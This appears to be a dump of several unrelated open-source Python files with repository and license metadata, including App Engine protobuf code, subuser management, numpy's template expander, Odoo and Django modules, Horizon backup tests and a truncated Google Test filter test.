#!/usr/bin/env python # # Copyright 2007 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from google.net.proto import ProtocolBuffer import array import dummy_thread as thread __pychecker__ = """maxreturns=0 maxbranches=0 no-callinit unusednames=printElemNumber,debug_strs no-special""" if hasattr(ProtocolBuffer, 'ExtendableProtocolMessage'): _extension_runtime = True _ExtendableProtocolMessage = ProtocolBuffer.ExtendableProtocolMessage else: _extension_runtime = False _ExtendableProtocolMessage = ProtocolBuffer.ProtocolMessage class Error(ProtocolBuffer.ProtocolMessage): BAD_REQUEST = 1 INTERNAL_ERROR = 2 _ErrorCode_NAMES = { 1: "BAD_REQUEST", 2: "INTERNAL_ERROR", } def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "") ErrorCode_Name = classmethod(ErrorCode_Name) def __init__(self, contents=None): pass if contents is not None: self.MergeFromString(contents) def MergeFrom(self, x): assert x is not self def Equals(self, x): if x is self: return 1 return 1 def IsInitialized(self, debug_strs=None): initialized = 1 return initialized def ByteSize(self): n = 0 return n def ByteSizePartial(self): n = 0 return n def Clear(self): pass def OutputUnchecked(self, out): pass def OutputPartial(self, out): pass def TryMerge(self, d): while d.avail() > 0: tt = d.getVarInt32() if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError d.skipData(tt) def __str__(self, prefix="", printElemNumber=0): res="" return res def _BuildTagLookupTable(sparse, maxtag, default=None): return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)]) _TEXT = _BuildTagLookupTable({ 0: "ErrorCode", }, 0) _TYPES = _BuildTagLookupTable({ 0: ProtocolBuffer.Encoder.NUMERIC, }, 0, ProtocolBuffer.Encoder.MAX_TYPE) _STYLE = """""" _STYLE_CONTENT_TYPE = """""" _PROTO_DESCRIPTOR_NAME = 'apphosting.prospective_search.Error' if _extension_runtime: pass __all__ = ['Error']
mit
weaver-viii/subuser
logic/subuserlib/subuser.py
2
3683
#!/usr/bin/env python # This file should be compatible with both Python 2 and 3. # If it is not, please file a bug report. """ High level operations on subusers. """ #external imports import sys import os import shutil #internal imports import subuserlib.resolve import subuserlib.classes.subuser import subuserlib.verify import subuserlib.update import subuserlib.classes.docker.dockerDaemon as dockerDaemon def add(user,subuserName,imageSourceIdentifier,permissionsAccepter): if subuserName.startswith("!"): sys.exit("A subusers may not have names beginning with ! as these names are reserved for internal use.") if subuserName in user.getRegistry().getSubusers(): sys.exit("A subuser named "+subuserName+" already exists.") user.getRegistry().logChange("Adding subuser "+subuserName+" "+imageSourceIdentifier) try: imageSource = subuserlib.resolve.resolveImageSource(user,imageSourceIdentifier) except KeyError as keyError: sys.exit("Could not add subuser. The image source "+imageSourceIdentifier+" does not exist.\n"+str(keyError)) addFromImageSource(user,subuserName,imageSource,permissionsAccepter) def addFromImageSource(user,subuserName,imageSource,permissionsAccepter): try: addFromImageSourceNoVerify(user,subuserName,imageSource) subuserlib.verify.verify(user,subuserNames=[subuserName],permissionsAccepter=permissionsAccepter) user.getRegistry().commit() except dockerDaemon.ImageBuildException as e: print("Adding subuser failed.") print(str(e)) subuserlib.update.checkoutNoCommit(user,"HEAD") def addFromImageSourceNoVerify(user,subuserName,imageSource): subuser = subuserlib.classes.subuser.Subuser(user,subuserName,imageSource,None,False,False,[]) user.getRegistry().getSubusers()[subuserName] = subuser def remove(user,subuserNames): didSomething = False for subuserName in subuserNames: if subuserName in user.getRegistry().getSubusers(): user.getRegistry().logChange("Removing subuser "+str(subuserName)) try: subuserHome = user.getRegistry().getSubusers()[subuserName].getHomeDirOnHost() if subuserHome and os.path.exists(subuserHome): user.getRegistry().logChange(" If you wish to remove the subusers home directory, issule the command $ rm -r "+subuserHome) except: pass user.getRegistry().logChange(" If you wish to remove the subusers image, issue the command $ subuser remove-old-images") subuser = user.getRegistry().getSubusers()[subuserName] for serviceSubuser in subuser.getServiceSubuserNames(): try: user.getRegistry().getSubusers()[serviceSubuser].removePermissions() del user.getRegistry().getSubusers()[serviceSubuser] except KeyError: pass # Remove service locks try: shutil.rmtree(os.path.join(user.getConfig()["lock-dir"],"services",subuserName)) except OSError: pass # Remove permission files user.getRegistry().getSubusers()[subuserName].removePermissions() del user.getRegistry().getSubusers()[subuserName] didSomething = True else: print("Cannot remove: subuser "+subuserName+" does not exist.") if didSomething: subuserlib.verify.verify(user) user.getRegistry().commit() def setExecutableShortcutInstalled(user,subuserName,installed): if installed: user.getRegistry().logChange("Creating shortcut for subuser "+subuserName) else: user.getRegistry().logChange("Removing shortcut for subuser "+subuserName) user.getRegistry().getSubusers()[subuserName].setExecutableShortcutInstalled(installed) subuserlib.verify.verify(user) user.getRegistry().commit()
lgpl-3.0
CMartelLML/numpy
numpy/distutils/from_template.py
164
7822
#!/usr/bin/python """ process_file(filename) takes templated file .xxx.src and produces .xxx file where .xxx is .pyf .f90 or .f using the following template rules: '<..>' denotes a template. All function and subroutine blocks in a source file with names that contain '<..>' will be replicated according to the rules in '<..>'. The number of comma-separeted words in '<..>' will determine the number of replicates. '<..>' may have two different forms, named and short. For example, named: <p=d,s,z,c> where anywhere inside a block '<p>' will be replaced with 'd', 's', 'z', and 'c' for each replicate of the block. <_c> is already defined: <_c=s,d,c,z> <_t> is already defined: <_t=real,double precision,complex,double complex> short: <s,d,c,z>, a short form of the named, useful when no <p> appears inside a block. In general, '<..>' contains a comma separated list of arbitrary expressions. If these expression must contain a comma|leftarrow|rightarrow, then prepend the comma|leftarrow|rightarrow with a backslash. If an expression matches '\\<index>' then it will be replaced by <index>-th expression. Note that all '<..>' forms in a block must have the same number of comma-separated entries. Predefined named template rules: <prefix=s,d,c,z> <ftype=real,double precision,complex,double complex> <ftypereal=real,double precision,\\0,\\1> <ctype=float,double,complex_float,complex_double> <ctypereal=float,double,\\0,\\1> """ from __future__ import division, absolute_import, print_function __all__ = ['process_str', 'process_file'] import os import sys import re routine_start_re = re.compile(r'(\n|\A)(( (\$|\*))|)\s*(subroutine|function)\b', re.I) routine_end_re = re.compile(r'\n\s*end\s*(subroutine|function)\b.*(\n|\Z)', re.I) function_start_re = re.compile(r'\n (\$|\*)\s*function\b', re.I) def parse_structure(astr): """ Return a list of tuples for each function or subroutine each tuple is the start and end of a subroutine or function to be expanded. """ spanlist = [] ind = 0 while True: m = routine_start_re.search(astr, ind) if m is None: break start = m.start() if function_start_re.match(astr, start, m.end()): while True: i = astr.rfind('\n', ind, start) if i==-1: break start = i if astr[i:i+7]!='\n $': break start += 1 m = routine_end_re.search(astr, m.end()) ind = end = m and m.end()-1 or len(astr) spanlist.append((start, end)) return spanlist template_re = re.compile(r"<\s*(\w[\w\d]*)\s*>") named_re = re.compile(r"<\s*(\w[\w\d]*)\s*=\s*(.*?)\s*>") list_re = re.compile(r"<\s*((.*?))\s*>") def find_repl_patterns(astr): reps = named_re.findall(astr) names = {} for rep in reps: name = rep[0].strip() or unique_key(names) repl = rep[1].replace('\,', '@comma@') thelist = conv(repl) names[name] = thelist return names item_re = re.compile(r"\A\\(?P<index>\d+)\Z") def conv(astr): b = astr.split(',') l = [x.strip() for x in b] for i in range(len(l)): m = item_re.match(l[i]) if m: j = int(m.group('index')) l[i] = l[j] return ','.join(l) def unique_key(adict): """ Obtain a unique key given a dictionary.""" allkeys = list(adict.keys()) done = False n = 1 while not done: newkey = '__l%s' % (n) if newkey in allkeys: n += 1 else: done = True return newkey template_name_re = re.compile(r'\A\s*(\w[\w\d]*)\s*\Z') def expand_sub(substr, names): substr = substr.replace('\>', '@rightarrow@') substr = substr.replace('\<', '@leftarrow@') lnames = find_repl_patterns(substr) substr = named_re.sub(r"<\1>", substr) # get rid of definition templates def listrepl(mobj): thelist = conv(mobj.group(1).replace('\,', '@comma@')) if template_name_re.match(thelist): return "<%s>" % (thelist) name = None for key in lnames.keys(): # see if list is already in dictionary if lnames[key] == thelist: name = key if name is None: # this list is not in the dictionary yet name = unique_key(lnames) lnames[name] = thelist return "<%s>" % name substr = list_re.sub(listrepl, substr) # convert all lists to named templates # newnames are constructed as needed numsubs = None base_rule = None rules = {} for r in template_re.findall(substr): if r not in rules: thelist = lnames.get(r, names.get(r, None)) if thelist is None: raise ValueError('No replicates found for <%s>' % (r)) if r not in names and not thelist.startswith('_'): names[r] = thelist rule = [i.replace('@comma@', ',') for i in thelist.split(',')] num = len(rule) if numsubs is None: numsubs = num rules[r] = rule base_rule = r elif num == numsubs: rules[r] = rule else: print("Mismatch in number of replacements (base <%s=%s>)" " for <%s=%s>. Ignoring." % (base_rule, ','.join(rules[base_rule]), r, thelist)) if not rules: return substr def namerepl(mobj): name = mobj.group(1) return rules.get(name, (k+1)*[name])[k] newstr = '' for k in range(numsubs): newstr += template_re.sub(namerepl, substr) + '\n\n' newstr = newstr.replace('@rightarrow@', '>') newstr = newstr.replace('@leftarrow@', '<') return newstr def process_str(allstr): newstr = allstr writestr = '' #_head # using _head will break free-format files struct = parse_structure(newstr) oldend = 0 names = {} names.update(_special_names) for sub in struct: writestr += newstr[oldend:sub[0]] names.update(find_repl_patterns(newstr[oldend:sub[0]])) writestr += expand_sub(newstr[sub[0]:sub[1]], names) oldend = sub[1] writestr += newstr[oldend:] return writestr include_src_re = re.compile(r"(\n|\A)\s*include\s*['\"](?P<name>[\w\d./\\]+[.]src)['\"]", re.I) def resolve_includes(source): d = os.path.dirname(source) fid = open(source) lines = [] for line in fid: m = include_src_re.match(line) if m: fn = m.group('name') if not os.path.isabs(fn): fn = os.path.join(d, fn) if os.path.isfile(fn): print('Including file', fn) lines.extend(resolve_includes(fn)) else: lines.append(line) else: lines.append(line) fid.close() return lines def process_file(source): lines = resolve_includes(source) return process_str(''.join(lines)) _special_names = find_repl_patterns(''' <_c=s,d,c,z> <_t=real,double precision,complex,double complex> <prefix=s,d,c,z> <ftype=real,double precision,complex,double complex> <ctype=float,double,complex_float,complex_double> <ftypereal=real,double precision,\\0,\\1> <ctypereal=float,double,\\0,\\1> ''') if __name__ == "__main__": try: file = sys.argv[1] except IndexError: fid = sys.stdin outfile = sys.stdout else: fid = open(file, 'r') (base, ext) = os.path.splitext(file) newname = base outfile = open(newname, 'w') allstr = fid.read() writestr = process_str(allstr) outfile.write(writestr)
bsd-3-clause
tsabi/Odoo-tsabi-fixes
addons/email_template/__openerp__.py
64
3160
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2009 Sharoon Thomas # Copyright (C) 2010-Today OpenERP SA (<http://www.openerp.com>) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> # ############################################################################## { 'name' : 'Email Templates', 'version' : '1.1', 'author' : 'OpenERP,OpenLabs', 'website' : 'http://openerp.com', 'category' : 'Marketing', 'depends' : ['mail'], 'description': """ Email Templating (simplified version of the original Power Email by Openlabs). ============================================================================== Lets you design complete email templates related to any OpenERP document (Sale Orders, Invoices and so on), including sender, recipient, subject, body (HTML and Text). You may also automatically attach files to your templates, or print and attach a report. For advanced use, the templates may include dynamic attributes of the document they are related to. For example, you may use the name of a Partner's country when writing to them, also providing a safe default in case the attribute is not defined. Each template contains a built-in assistant to help with the inclusion of these dynamic values. If you enable the option, a composition assistant will also appear in the sidebar of the OpenERP documents to which the template applies (e.g. Invoices). This serves as a quick way to send a new email based on the template, after reviewing and adapting the contents, if needed. This composition assistant will also turn into a mass mailing system when called for multiple documents at once. These email templates are also at the heart of the marketing campaign system (see the ``marketing_campaign`` application), if you need to automate larger campaigns on any OpenERP document. **Technical note:** only the templating system of the original Power Email by Openlabs was kept. """, 'data': [ 'wizard/email_template_preview_view.xml', 'email_template_view.xml', 'res_partner_view.xml', 'ir_actions_view.xml', 'wizard/mail_compose_message_view.xml', 'security/ir.model.access.csv' ], 'demo': [], 'installable': True, 'auto_install': True, 'images': ['images/1_email_account.jpeg','images/2_email_template.jpeg','images/3_emails.jpeg'], } # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
betoesquivel/fil2014
build/django/django/contrib/messages/storage/fallback.py
627
2171
from django.contrib.messages.storage.base import BaseStorage from django.contrib.messages.storage.cookie import CookieStorage from django.contrib.messages.storage.session import SessionStorage class FallbackStorage(BaseStorage): """ Tries to store all messages in the first backend, storing any unstored messages in each subsequent backend backend. """ storage_classes = (CookieStorage, SessionStorage) def __init__(self, *args, **kwargs): super(FallbackStorage, self).__init__(*args, **kwargs) self.storages = [storage_class(*args, **kwargs) for storage_class in self.storage_classes] self._used_storages = set() def _get(self, *args, **kwargs): """ Gets a single list of messages from all storage backends. """ all_messages = [] for storage in self.storages: messages, all_retrieved = storage._get() # If the backend hasn't been used, no more retrieval is necessary. if messages is None: break if messages: self._used_storages.add(storage) all_messages.extend(messages) # If this storage class contained all the messages, no further # retrieval is necessary if all_retrieved: break return all_messages, all_retrieved def _store(self, messages, response, *args, **kwargs): """ Stores the messages, returning any unstored messages after trying all backends. For each storage backend, any messages not stored are passed on to the next backend. """ for storage in self.storages: if messages: messages = storage._store(messages, response, remove_oldest=False) # Even if there are no more messages, continue iterating to ensure # storages which contained messages are flushed. elif storage in self._used_storages: storage._store([], response) self._used_storages.remove(storage) return messages
mit
phoebusliang/parallel-lettuce
tests/integration/lib/Django-1.2.5/django/db/models/manager.py
306
7872
from django.utils import copycompat as copy from django.conf import settings from django.db import router from django.db.models.query import QuerySet, EmptyQuerySet, insert_query, RawQuerySet from django.db.models import signals from django.db.models.fields import FieldDoesNotExist def ensure_default_manager(sender, **kwargs): """ Ensures that a Model subclass contains a default manager and sets the _default_manager attribute on the class. Also sets up the _base_manager points to a plain Manager instance (which could be the same as _default_manager if it's not a subclass of Manager). """ cls = sender if cls._meta.abstract: return if not getattr(cls, '_default_manager', None): # Create the default manager, if needed. try: cls._meta.get_field('objects') raise ValueError("Model %s must specify a custom Manager, because it has a field named 'objects'" % cls.__name__) except FieldDoesNotExist: pass cls.add_to_class('objects', Manager()) cls._base_manager = cls.objects elif not getattr(cls, '_base_manager', None): default_mgr = cls._default_manager.__class__ if (default_mgr is Manager or getattr(default_mgr, "use_for_related_fields", False)): cls._base_manager = cls._default_manager else: # Default manager isn't a plain Manager class, or a suitable # replacement, so we walk up the base class hierarchy until we hit # something appropriate. for base_class in default_mgr.mro()[1:]: if (base_class is Manager or getattr(base_class, "use_for_related_fields", False)): cls.add_to_class('_base_manager', base_class()) return raise AssertionError("Should never get here. Please report a bug, including your model and model manager setup.") signals.class_prepared.connect(ensure_default_manager) class Manager(object): # Tracks each time a Manager instance is created. Used to retain order. creation_counter = 0 def __init__(self): super(Manager, self).__init__() self._set_creation_counter() self.model = None self._inherited = False self._db = None def contribute_to_class(self, model, name): # TODO: Use weakref because of possible memory leak / circular reference. self.model = model setattr(model, name, ManagerDescriptor(self)) if not getattr(model, '_default_manager', None) or self.creation_counter < model._default_manager.creation_counter: model._default_manager = self if model._meta.abstract or (self._inherited and not self.model._meta.proxy): model._meta.abstract_managers.append((self.creation_counter, name, self)) else: model._meta.concrete_managers.append((self.creation_counter, name, self)) def _set_creation_counter(self): """ Sets the creation counter value for this instance and increments the class-level copy. """ self.creation_counter = Manager.creation_counter Manager.creation_counter += 1 def _copy_to_model(self, model): """ Makes a copy of the manager and assigns it to 'model', which should be a child of the existing model (used when inheriting a manager from an abstract base class). """ assert issubclass(model, self.model) mgr = copy.copy(self) mgr._set_creation_counter() mgr.model = model mgr._inherited = True return mgr def db_manager(self, using): obj = copy.copy(self) obj._db = using return obj @property def db(self): return self._db or router.db_for_read(self.model) ####################### # PROXIES TO QUERYSET # ####################### def get_empty_query_set(self): return EmptyQuerySet(self.model, using=self._db) def get_query_set(self): """Returns a new QuerySet object. Subclasses can override this method to easily customize the behavior of the Manager. """ return QuerySet(self.model, using=self._db) def none(self): return self.get_empty_query_set() def all(self): return self.get_query_set() def count(self): return self.get_query_set().count() def dates(self, *args, **kwargs): return self.get_query_set().dates(*args, **kwargs) def distinct(self, *args, **kwargs): return self.get_query_set().distinct(*args, **kwargs) def extra(self, *args, **kwargs): return self.get_query_set().extra(*args, **kwargs) def get(self, *args, **kwargs): return self.get_query_set().get(*args, **kwargs) def get_or_create(self, **kwargs): return self.get_query_set().get_or_create(**kwargs) def create(self, **kwargs): return self.get_query_set().create(**kwargs) def filter(self, *args, **kwargs): return self.get_query_set().filter(*args, **kwargs) def aggregate(self, *args, **kwargs): return self.get_query_set().aggregate(*args, **kwargs) def annotate(self, *args, **kwargs): return self.get_query_set().annotate(*args, **kwargs) def complex_filter(self, *args, **kwargs): return self.get_query_set().complex_filter(*args, **kwargs) def exclude(self, *args, **kwargs): return self.get_query_set().exclude(*args, **kwargs) def in_bulk(self, *args, **kwargs): return self.get_query_set().in_bulk(*args, **kwargs) def iterator(self, *args, **kwargs): return self.get_query_set().iterator(*args, **kwargs) def latest(self, *args, **kwargs): return self.get_query_set().latest(*args, **kwargs) def order_by(self, *args, **kwargs): return self.get_query_set().order_by(*args, **kwargs) def select_related(self, *args, **kwargs): return self.get_query_set().select_related(*args, **kwargs) def values(self, *args, **kwargs): return self.get_query_set().values(*args, **kwargs) def values_list(self, *args, **kwargs): return self.get_query_set().values_list(*args, **kwargs) def update(self, *args, **kwargs): return self.get_query_set().update(*args, **kwargs) def reverse(self, *args, **kwargs): return self.get_query_set().reverse(*args, **kwargs) def defer(self, *args, **kwargs): return self.get_query_set().defer(*args, **kwargs) def only(self, *args, **kwargs): return self.get_query_set().only(*args, **kwargs) def using(self, *args, **kwargs): return self.get_query_set().using(*args, **kwargs) def exists(self, *args, **kwargs): return self.get_query_set().exists(*args, **kwargs) def _insert(self, values, **kwargs): return insert_query(self.model, values, **kwargs) def _update(self, values, **kwargs): return self.get_query_set()._update(values, **kwargs) def raw(self, raw_query, params=None, *args, **kwargs): return RawQuerySet(raw_query=raw_query, model=self.model, params=params, using=self._db, *args, **kwargs) class ManagerDescriptor(object): # This class ensures managers aren't accessible via model instances. # For example, Poll.objects works, but poll_obj.objects raises AttributeError. def __init__(self, manager): self.manager = manager def __get__(self, instance, type=None): if instance != None: raise AttributeError("Manager isn't accessible via %s instances" % type.__name__) return self.manager class EmptyManager(Manager): def get_query_set(self): return self.get_empty_query_set()
gpl-3.0
JioCloud/horizon
openstack_dashboard/dashboards/project/database_backups/tests.py
11
6384
# Copyright 2013 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from django.core.urlresolvers import reverse from django import http from mox import IsA # noqa from openstack_dashboard import api from openstack_dashboard.test import helpers as test INDEX_URL = reverse('horizon:project:database_backups:index') BACKUP_URL = reverse('horizon:project:database_backups:create') DETAILS_URL = reverse('horizon:project:database_backups:detail', args=['id']) class DatabasesBackupsTests(test.TestCase): @test.create_stubs({api.trove: ('backup_list', 'instance_get')}) def test_index(self): api.trove.backup_list(IsA(http.HttpRequest))\ .AndReturn(self.database_backups.list()) api.trove.instance_get(IsA(http.HttpRequest), IsA(str))\ .MultipleTimes()\ .AndReturn(self.databases.first()) self.mox.ReplayAll() res = self.client.get(INDEX_URL) self.assertTemplateUsed(res, 'project/database_backups/index.html') @test.create_stubs({api.trove: ('backup_list',)}) def test_index_exception(self): api.trove.backup_list(IsA(http.HttpRequest))\ .AndRaise(self.exceptions.trove) self.mox.ReplayAll() res = self.client.get(INDEX_URL) self.assertTemplateUsed( res, 'project/database_backups/index.html') self.assertEqual(res.status_code, 200) self.assertMessageCount(res, error=1) @test.create_stubs({api.trove: ('instance_list', 'backup_list', 'backup_create')}) def test_launch_backup(self): api.trove.instance_list(IsA(http.HttpRequest))\ .AndReturn(self.databases.list()) api.trove.backup_list(IsA(http.HttpRequest)) \ .AndReturn(self.database_backups.list()) database = self.databases.first() backupName = "NewBackup" backupDesc = "Backup Description" api.trove.backup_create( IsA(http.HttpRequest), backupName, database.id, backupDesc, "") self.mox.ReplayAll() post = { 'name': backupName, 'instance': database.id, 'description': backupDesc, 'parent': "" } res = self.client.post(BACKUP_URL, post) self.assertNoFormErrors(res) self.assertRedirectsNoFollow(res, INDEX_URL) @test.create_stubs({api.trove: ('instance_list', 'backup_list')}) def test_launch_backup_exception(self): api.trove.instance_list(IsA(http.HttpRequest))\ .AndRaise(self.exceptions.trove) api.trove.backup_list(IsA(http.HttpRequest)) \ .AndReturn(self.database_backups.list()) self.mox.ReplayAll() res = self.client.get(BACKUP_URL) self.assertMessageCount(res, error=1) self.assertTemplateUsed(res, 'project/database_backups/backup.html') @test.create_stubs({api.trove: ('instance_list', 'backup_list', 'backup_create')}) def test_launch_backup_incr(self): api.trove.instance_list(IsA(http.HttpRequest)) \ .AndReturn(self.databases.list()) api.trove.backup_list(IsA(http.HttpRequest)) \ .AndReturn(self.database_backups.list()) database = self.databases.first() backupName = "NewBackup" backupDesc = "Backup Description" backupParent = self.database_backups.first() api.trove.backup_create( IsA(http.HttpRequest), backupName, database.id, backupDesc, backupParent.id) self.mox.ReplayAll() post = { 'name': backupName, 'instance': database.id, 'description': backupDesc, 'parent': backupParent.id, } res = self.client.post(BACKUP_URL, post) self.assertNoFormErrors(res) self.assertRedirectsNoFollow(res, INDEX_URL) @test.create_stubs({api.trove: ('backup_get', 'instance_get')}) def test_detail_backup(self): api.trove.backup_get(IsA(http.HttpRequest), IsA(unicode))\ .AndReturn(self.database_backups.first()) api.trove.instance_get(IsA(http.HttpRequest), IsA(str))\ .AndReturn(self.databases.first()) self.mox.ReplayAll() res = self.client.get(DETAILS_URL) self.assertTemplateUsed(res, 'project/database_backups/details.html') @test.create_stubs({api.trove: ('backup_get',)}) def test_detail_backup_notfound(self): api.trove.backup_get(IsA(http.HttpRequest), IsA(unicode))\ .AndRaise(self.exceptions.trove) self.mox.ReplayAll() res = self.client.get(DETAILS_URL) self.assertRedirectsNoFollow(res, INDEX_URL) @test.create_stubs({api.trove: ('backup_get', 'instance_get')}) def test_detail_backup_incr(self): incr_backup = self.database_backups.list()[2] parent_backup = self.database_backups.list()[1] api.trove.backup_get(IsA(http.HttpRequest), IsA(unicode))\ .AndReturn(incr_backup) api.trove.backup_get(IsA(http.HttpRequest), incr_backup.parent_id) \ .AndReturn(parent_backup) api.trove.instance_get(IsA(http.HttpRequest), IsA(str))\ .AndReturn(self.databases.list()[1]) self.mox.ReplayAll() url = reverse('horizon:project:database_backups:detail', args=[incr_backup.id]) res = self.client.get(url) self.assertTemplateUsed(res, 'project/database_backups/details.html')
apache-2.0
yaoandw/joke
Pods/AVOSCloudCrashReporting/Breakpad/src/third_party/protobuf/protobuf/gtest/test/gtest_filter_unittest.py
2826
21261
#!/usr/bin/env python # # Copyright 2005 Google Inc. All Rights Reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for Google Test test filters. A user can specify which test(s) in a Google Test program to run via either the GTEST_FILTER environment variable or the --gtest_filter flag. This script tests such functionality by invoking gtest_filter_unittest_ (a program written with Google Test) with different environments and command line flags. Note that test sharding may also influence which tests are filtered. Therefore, we test that here also. """ __author__ = 'wan@google.com (Zhanyong Wan)' import os import re import sets import sys import gtest_test_utils # Constants. # Checks if this platform can pass empty environment variables to child # processes. We set an env variable to an empty string and invoke a python # script in a subprocess to print whether the variable is STILL in # os.environ. We then use 'eval' to parse the child's output so that an # exception is thrown if the input is anything other than 'True' nor 'False'. os.environ['EMPTY_VAR'] = '' child = gtest_test_utils.Subprocess( [sys.executable, '-c', 'import os; print \'EMPTY_VAR\' in os.environ']) CAN_PASS_EMPTY_ENV = eval(child.output) # Check if this platform can unset environment variables in child processes. # We set an env variable to a non-empty string, unset it, and invoke # a python script in a subprocess to print whether the variable # is NO LONGER in os.environ. # We use 'eval' to parse the child's output so that an exception # is thrown if the input is neither 'True' nor 'False'. os.environ['UNSET_VAR'] = 'X' del os.environ['UNSET_VAR'] child = gtest_test_utils.Subprocess( [sys.executable, '-c', 'import os; print \'UNSET_VAR\' not in os.environ']) CAN_UNSET_ENV = eval(child.output) # Checks if we should test with an empty filter. This doesn't # make sense on platforms that cannot pass empty env variables (Win32) # and on platforms that cannot unset variables (since we cannot tell # the difference between "" and NULL -- Borland and Solaris < 5.10) CAN_TEST_EMPTY_FILTER = (CAN_PASS_EMPTY_ENV and CAN_UNSET_ENV) # The environment variable for specifying the test filters. FILTER_ENV_VAR = 'GTEST_FILTER' # The environment variables for test sharding. TOTAL_SHARDS_ENV_VAR = 'GTEST_TOTAL_SHARDS' SHARD_INDEX_ENV_VAR = 'GTEST_SHARD_INDEX' SHARD_STATUS_FILE_ENV_VAR = 'GTEST_SHARD_STATUS_FILE' # The command line flag for specifying the test filters. FILTER_FLAG = 'gtest_filter' # The command line flag for including disabled tests. ALSO_RUN_DISABED_TESTS_FLAG = 'gtest_also_run_disabled_tests' # Command to run the gtest_filter_unittest_ program. COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_filter_unittest_') # Regex for determining whether parameterized tests are enabled in the binary. PARAM_TEST_REGEX = re.compile(r'/ParamTest') # Regex for parsing test case names from Google Test's output. TEST_CASE_REGEX = re.compile(r'^\[\-+\] \d+ tests? from (\w+(/\w+)?)') # Regex for parsing test names from Google Test's output. TEST_REGEX = re.compile(r'^\[\s*RUN\s*\].*\.(\w+(/\w+)?)') # The command line flag to tell Google Test to output the list of tests it # will run. LIST_TESTS_FLAG = '--gtest_list_tests' # Indicates whether Google Test supports death tests. SUPPORTS_DEATH_TESTS = 'HasDeathTest' in gtest_test_utils.Subprocess( [COMMAND, LIST_TESTS_FLAG]).output # Full names of all tests in gtest_filter_unittests_. PARAM_TESTS = [ 'SeqP/ParamTest.TestX/0', 'SeqP/ParamTest.TestX/1', 'SeqP/ParamTest.TestY/0', 'SeqP/ParamTest.TestY/1', 'SeqQ/ParamTest.TestX/0', 'SeqQ/ParamTest.TestX/1', 'SeqQ/ParamTest.TestY/0', 'SeqQ/ParamTest.TestY/1', ] DISABLED_TESTS = [ 'BarTest.DISABLED_TestFour', 'BarTest.DISABLED_TestFive', 'BazTest.DISABLED_TestC', 'DISABLED_FoobarTest.Test1', 'DISABLED_FoobarTest.DISABLED_Test2', 'DISABLED_FoobarbazTest.TestA', ] if SUPPORTS_DEATH_TESTS: DEATH_TESTS = [ 'HasDeathTest.Test1', 'HasDeathTest.Test2', ] else: DEATH_TESTS = [] # All the non-disabled tests. ACTIVE_TESTS = [ 'FooTest.Abc', 'FooTest.Xyz', 'BarTest.TestOne', 'BarTest.TestTwo', 'BarTest.TestThree', 'BazTest.TestOne', 'BazTest.TestA', 'BazTest.TestB', ] + DEATH_TESTS + PARAM_TESTS param_tests_present = None # Utilities. environ = os.environ.copy() def SetEnvVar(env_var, value): """Sets the env variable to 'value'; unsets it when 'value' is None.""" if value is not None: environ[env_var] = value elif env_var in environ: del environ[env_var] def RunAndReturnOutput(args = None): """Runs the test program and returns its output.""" return gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ).output def RunAndExtractTestList(args = None): """Runs the test program and returns its exit code and a list of tests run.""" p = gtest_test_utils.Subprocess([COMMAND] + (args or []), env=environ) tests_run = [] test_case = '' test = '' for line in p.output.split('\n'): match = TEST_CASE_REGEX.match(line) if match is not None: test_case = match.group(1) else: match = TEST_REGEX.match(line) if match is not None: test = match.group(1) tests_run.append(test_case + '.' + test) return (tests_run, p.exit_code) def InvokeWithModifiedEnv(extra_env, function, *args, **kwargs): """Runs the given function and arguments in a modified environment.""" try: original_env = environ.copy() environ.update(extra_env) return function(*args, **kwargs) finally: environ.clear() environ.update(original_env) def 